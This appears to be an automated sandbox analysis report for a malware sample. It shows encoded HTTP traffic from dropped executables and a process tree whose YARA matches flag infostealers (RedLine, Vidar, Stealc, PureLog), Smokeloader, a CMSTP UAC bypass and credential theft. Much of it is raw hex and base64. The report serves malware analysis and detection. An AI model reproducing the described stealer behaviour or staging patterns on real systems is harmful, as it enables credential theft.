                                                                                                                                                                                                                                                                                      Data Ascii: A$,@CZ,@C,@C,@C;-@C-@C-@Ca.@C.@C%/@C/@C/@CK0@C0@C1@Cq1@C1@C52@C2@C2@C;3@C~3@C3@C4@CE4@C4@C4@C=5@C5@C5@C
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:14.850194931 CEST1289INData Raw: 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 30 e4 40 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 d0 41 40 00 01 00 03 53 72 63 02 00 00 9c 10
                                                                                                                                                                                                                                                                                      Data Ascii: StartIndex@Countb0@CopySelfA@Src@StartIndex'@Dest@Countb@CopySelf'@SrcA@Dest@StartIndex@Countb@Copy
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:14.850207090 CEST1289INData Raw: 36 03 00 80 10 40 00 08 00 03 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 9c 27 40 00 01 00 03 50 74 72 02 00 00 54 11 40 00 02 00 03 4f 66 73 02 00 02 00 43 00 d4 e8 40 00 09 52 65 61 64 49 6e 74 33 32 03 00 9c 10 40 00 08 00 03 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii: 6@Self'@PtrT@OfsC@ReadInt32@Self'@PtrT@OfsC@ReadInt64@Self'@PtrT@OfsA@ReadPtr'@Self'@PtrT@
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:14.850218058 CEST1289INData Raw: 00 00 00 00 04 53 65 6c 66 02 00 01 00 00 00 00 01 00 05 56 61 6c 75 65 02 00 02 00 3e 00 78 ea 40 00 11 41 6c 6c 6f 63 53 74 72 69 6e 67 41 73 41 6e 73 69 03 00 9c 27 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 b8 12 40 00 01 00
                                                                                                                                                                                                                                                                                      Data Ascii: SelfValue>x@AllocStringAsAnsi'@Self@StrP@AllocStringAsAnsi'@Self@Str@CodePageA@AllocStringAsUnicode'@Self@Str<l@A
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:15.052480936 CEST1289INData Raw: 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 9c 27 40 00 01 00 03 50 74 72 02 00 02 b8 12 40 00 02 00 05 56 61 6c 75 65 02 00 00 9c 10 40 00 0c 00 0f 4d 61 78 43 68 61 72 73 49 6e 63 4e 75 6c 6c 02 00 00 cc 10 40 00 08 00 08 43 6f 64 65 50 61 67 65
                                                                                                                                                                                                                                                                                      Data Ascii: Self'@Ptr@Value@MaxCharsIncNull@CodePages@WriteStringAsAnsiSelf'@PtrT@Ofs@Value@MaxCharsIncNull@WriteStringAsAnsiS


Session ID:6
Source IP:192.168.2.5
Source Port:49718
Destination IP:20.157.87.45
Destination Port:80
PID:1784
Process:C:\Users\user\AppData\Local\Temp\u3z0.1.exe

Timestamp:Apr 23, 2024 09:28:22.612129927 CEST
Bytes transferred:266
Direction:OUT
Data:
POST /__svc/sbv/DownloadManager.ashx HTTP/1.0
Connection: keep-alive
Content-Length: 300
Host: svc.iolo.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:22.816301107 CEST300OUTData Raw: 2f 65 5a 42 73 2b 42 6c 51 46 58 71 30 59 64 4b 4f 31 72 57 47 6f 58 70 79 6d 68 5a 4b 6f 47 4f 76 4a 32 75 58 54 55 46 32 2b 30 66 46 76 61 45 49 51 2b 2f 6c 33 6e 69 78 46 78 62 4d 79 2b 36 32 6f 73 72 64 32 2b 64 57 65 6e 6f 6b 77 76 6c 48 62
                                                                                                                                                                                                                                                                                      Data Ascii: /eZBs+BlQFXq0YdKO1rWGoXpymhZKoGOvJ2uXTUF2+0fFvaEIQ+/l3nixFxbMy+62osrd2+dWenokwvlHbQ3q8eV0Qx+sRVrwIuOdpxbCQ6/gpdrdPc0dPp2yFiTtXpXLFc20MMPt736DHHnFUtB8RByJnUp0u2/VdqgLICfLL1rJJAjFmZqgUei5EZzhfnEiR5dqfQ3Z0YLnFtVOWwMFg4lvwpMiNrtOx5Ld+YvOlUKSq2A7tC
Timestamp:Apr 23, 2024 09:28:23.020081043 CEST
Bytes transferred:469
Direction:IN
Data:
HTTP/1.1 200 OK
cache-control: private
content-length: 256
content-type: text/html; charset=utf-8
x-whom: Ioloweb8
date: Tue, 23 Apr 2024 07:28:11 GMT
set-cookie: SERVERID=svc8; path=/
connection: close
                                                                                                                                                                                                                                                                                      Data Raw: 31 33 32 62 68 5a 33 4d 56 38 47 36 64 71 53 38 4c 68 46 6d 33 71 59 50 6f 4a 44 73 46 59 47 5a 70 75 54 32 2b 37 36 66 6f 6e 75 4b 30 71 57 64 75 67 30 6b 30 70 75 48 51 4a 2f 66 61 70 67 77 74 64 4f 58 51 72 79 6c 55 6c 2f 68 70 6c 34 34 77 75 67 69 4f 32 2f 4b 6d 7a 6f 53 4c 72 54 45 55 6f 48 62 4d 42 42 67 31 47 54 69 4e 4e 32 63 6d 75 6d 50 77 44 71 31 6d 6a 77 55 37 4e 53 74 5a 6b 6c 61 2b 58 79 47 77 54 6e 78 65 43 69 2b 4e 4d 45 63 47 70 31 32 65 33 6f 70 53 41 39 50 4a 46 62 53 5a 36 38 53 45 41 4c 54 76 7a 4f 7a 30 53 30 42 6a 6f 4c 65 42 30 6a 63 5a 36 45 54 63 6f 77 4e 31 2f 58 32 4b 70 7a 78 31 48 54 4c 69 70 4b 4b 76 30 54 52 58 32 6b 49 67 44 35 52 30 6c 4d 6b 61 4c 6b 6c 6d 7a 6c 6f 54 64 4c 47 7a 35 6c 79 45 65 4a 6e 66 79 53 76 79 4d 66 32
                                                                                                                                                                                                                                                                                      Data Ascii: 132bhZ3MV8G6dqS8LhFm3qYPoJDsFYGZpuT2+76fonuK0qWdug0k0puHQJ/fapgwtdOXQrylUl/hpl44wugiO2/KmzoSLrTEUoHbMBBg1GTiNN2cmumPwDq1mjwU7NStZkla+XyGwTnxeCi+NMEcGp12e3opSA9PJFbSZ68SEALTvzOz0S0BjoLeB0jcZ6ETcowN1/X2Kpzx1HTLipKKv0TRX2kIgD5R0lMkaLklmzloTdLGz5lyEeJnfySvyMf2


Session ID:7
Source IP:192.168.2.5
Source Port:49737
Destination IP:20.157.87.45
Destination Port:80
PID:1784
Process:C:\Users\user\AppData\Local\Temp\u3z0.1.exe

Timestamp:Apr 23, 2024 09:28:39.018325090 CEST
Bytes transferred:266
Direction:OUT
Data:
POST /__svc/sbv/DownloadManager.ashx HTTP/1.0
Connection: keep-alive
Content-Length: 300
Host: svc.iolo.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:39.228044987 CEST300OUTData Raw: 2f 65 5a 42 73 2b 42 6c 51 46 58 71 30 59 64 4b 4f 31 72 57 47 6f 58 70 79 6d 68 5a 4b 6f 47 4f 76 4a 32 75 58 54 55 46 32 2b 30 74 69 53 56 57 6f 48 52 30 44 67 2b 47 4d 38 61 53 79 38 54 4c 32 6f 73 72 64 32 2b 64 57 65 6e 6f 6b 77 76 6c 48 62
                                                                                                                                                                                                                                                                                      Data Ascii: /eZBs+BlQFXq0YdKO1rWGoXpymhZKoGOvJ2uXTUF2+0tiSVWoHR0Dg+GM8aSy8TL2osrd2+dWenokwvlHbQ3q8eV0Qx+sRVrwIuOdpxbCQ6/gpdrdPc0dPp2yFiTtXpXLFc20MMPt736DHHnFUtB8RByJnUp0u2/VdqgLICfLL1rJJAjFmZqgUei5EZzhfnEiR5dqfQ3Z0YLnFtVOWwMFg4lvwpMiNrtOx5Ld+YvOlUKSq2A7tC
Timestamp:Apr 23, 2024 09:28:39.441235065 CEST
Bytes transferred:405
Direction:IN
Data:
HTTP/1.1 200 OK
cache-control: private
content-length: 192
content-type: text/html; charset=utf-8
x-whom: Ioloweb4
date: Tue, 23 Apr 2024 07:28:27 GMT
set-cookie: SERVERID=svc4; path=/
connection: close
                                                                                                                                                                                                                                                                                      Data Raw: 39 76 37 59 43 62 54 6a 68 53 4f 54 65 7a 71 52 74 42 41 38 44 61 46 35 46 43 52 49 72 4c 62 32 49 6c 78 6c 34 38 6a 4b 61 69 32 6d 65 6d 45 6e 73 33 69 48 76 54 35 4c 2b 48 33 43 49 6c 49 68 4f 6f 33 44 5a 35 33 6d 6c 6a 61 38 4b 42 32 59 45 49 73 2f 6a 31 50 54 39 36 78 49 73 73 61 66 69 37 62 44 69 4d 64 6b 2f 49 41 58 37 55 4a 75 55 59 31 35 61 38 31 67 4d 75 75 46 5a 4c 41 54 67 2b 42 39 62 35 69 4b 57 33 77 6f 49 4f 50 6c 6f 49 59 4a 45 65 78 30 33 62 6f 4c 51 68 4f 49 70 2b 4f 45 77 34 6a 52 4c 48 75 52 75 35 62 44 2b 34 61 49 49 42 63 42 43 43 69 6d 2b 6b 4e 53
                                                                                                                                                                                                                                                                                      Data Ascii: 9v7YCbTjhSOTezqRtBA8DaF5FCRIrLb2Ilxl48jKai2memEns3iHvT5L+H3CIlIhOo3DZ53mlja8KB2YEIs/j1PT96xIssafi7bDiMdk/IAX7UJuUY15a81gMuuFZLATg+B9b5iKW3woIOPloIYJEex03boLQhOIp+OEw4jRLHuRu5bD+4aIIBcBCCim+kNS


                                                                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                                                                      Start time:09:27:55
                                                                                                                                                                                                                                                                                      Start date:23/04/2024
                                                                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\4BfhCycV4B.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\4BfhCycV4B.exe"
                                                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                                                      File size:485'377 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:71EF0FB3BE89DC92FCBE7A6E8E6D6EE8
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2435074573.00000000042ED000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.2263644143.0000000006B16000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Has exited:true

Target ID:2
Start time:09:27:59
Start date:23/04/2024
Path:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\u3z0.0.exe"
Imagebase:0x400000
File size:336'384 bytes
MD5 hash:65A31455A497CAEE44C5AA749C50E40B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000002.2435664162.0000000004402000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000002.00000002.2435628438.00000000043ED000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000003.2058251451.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000002.00000003.2058251451.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.2435217330.00000000041C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000002.00000002.2435217330.00000000041C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000002.00000002.2435217330.00000000041C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
• Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
Reputation:low
Has exited:true

Target ID:4
Start time:09:28:13
Start date:23/04/2024
Path:C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe"
Imagebase:0x400000
File size:8'538'160 bytes
MD5 hash:54D53F5BDB925B3ED005A84B5492447F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Antivirus matches:
• Detection: 3%, ReversingLabs
Reputation:low
Has exited:true

Target ID:5
Start time:09:28:17
Start date:23/04/2024
Path:C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe
Imagebase:0x340000
File size:2'469'936 bytes
MD5 hash:9FB4770CED09AAE3B437C1C6EB6D7334
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.2244250697.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 0%, ReversingLabs
Reputation:low
Has exited:true

Target ID:6
Start time:09:28:17
Start date:23/04/2024
Path:C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe
Imagebase:0xf60000
File size:2'469'936 bytes
MD5 hash:9FB4770CED09AAE3B437C1C6EB6D7334
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.2308308308.0000000003B73000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 0%, ReversingLabs
Reputation:low
Has exited:true

Target ID:7
Start time:09:28:19
Start date:23/04/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\cmd.exe
Imagebase:0x790000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2531187835.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000002.2531187835.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:high
Has exited:true

Target ID:8
Start time:09:28:19
Start date:23/04/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                      Target ID:9
                                                                                                                                                                                                                                                                                      Start time:09:28:19
                                                                                                                                                                                                                                                                                      Start date:23/04/2024
                                                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\u3z0.1.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\u3z0.1.exe"
                                                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                                                      File size:4'866'096 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:397926927BCA55BE4A77839B1C44DE6E
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000009.00000000.2257557220.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                                                                      • Detection: 4%, ReversingLabs
                                                                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      Target ID:12
                                                                                                                                                                                                                                                                                      Start time:09:28:21
                                                                                                                                                                                                                                                                                      Start date:23/04/2024
                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5148 -s 1124
                                                                                                                                                                                                                                                                                      Imagebase:0xe10000
                                                                                                                                                                                                                                                                                      File size:483'680 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      Target ID:17
                                                                                                                                                                                                                                                                                      Start time:09:28:31
                                                                                                                                                                                                                                                                                      Start date:23/04/2024
                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6300 -s 2188
                                                                                                                                                                                                                                                                                      Imagebase:0xe10000
                                                                                                                                                                                                                                                                                      File size:483'680 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      Target ID:18
                                                                                                                                                                                                                                                                                      Start time:09:28:38
                                                                                                                                                                                                                                                                                      Start date:23/04/2024
                                                                                                                                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                                      Imagebase:0xe70000
                                                                                                                                                                                                                                                                                      File size:262'432 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                      Target ID:19
                                                                                                                                                                                                                                                                                      Start time:09:28:39
                                                                                                                                                                                                                                                                                      Start date:23/04/2024
                                                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
                                                                                                                                                                                                                                                                                      Imagebase:0x13e31d50000
                                                                                                                                                                                                                                                                                      File size:59'721'128 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:8E9C467EAC35B35DA1F586014F29C330
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000013.00000002.3309717239.0000013E37370000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000013.00000000.2454770621.0000013E34F8B000.00000002.00000001.01000000.00000017.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000013.00000000.2454770621.0000013E31D8B000.00000002.00000001.01000000.00000017.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                      Target ID:20
                                                                                                                                                                                                                                                                                      Start time:09:28:40
                                                                                                                                                                                                                                                                                      Start date:23/04/2024
                                                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe"
                                                                                                                                                                                                                                                                                      Imagebase:0xf60000
                                                                                                                                                                                                                                                                                      File size:2'469'936 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:9FB4770CED09AAE3B437C1C6EB6D7334
                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000014.00000002.2531256823.00000000036F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      Target ID:21
                                                                                                                                                                                                                                                                                      Start time:09:28:41
                                                                                                                                                                                                                                                                                      Start date:23/04/2024
                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      Imagebase:0x790000
                                                                                                                                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000015.00000002.2752594150.0000000004DC4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000002.2752907263.00000000053C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000015.00000002.2752907263.00000000053C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      Target ID:22
                                                                                                                                                                                                                                                                                      Start time:09:28:41
                                                                                                                                                                                                                                                                                      Start date:23/04/2024
                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                      Target ID:24
                                                                                                                                                                                                                                                                                      Start time:09:29:02
                                                                                                                                                                                                                                                                                      Start date:23/04/2024
                                                                                                                                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                                      Imagebase:0x5f0000
                                                                                                                                                                                                                                                                                      File size:262'432 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000002.3282767064.0000000000ABB000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      Has exited:false


                                                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                                                        Execution Coverage:5.4%
                                                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:2.4%
                                                                                                                                                                                                                                                                                        Signature Coverage:10.8%
                                                                                                                                                                                                                                                                                        Total number of Nodes:1173
                                                                                                                                                                                                                                                                                        Total number of Limit Nodes:17
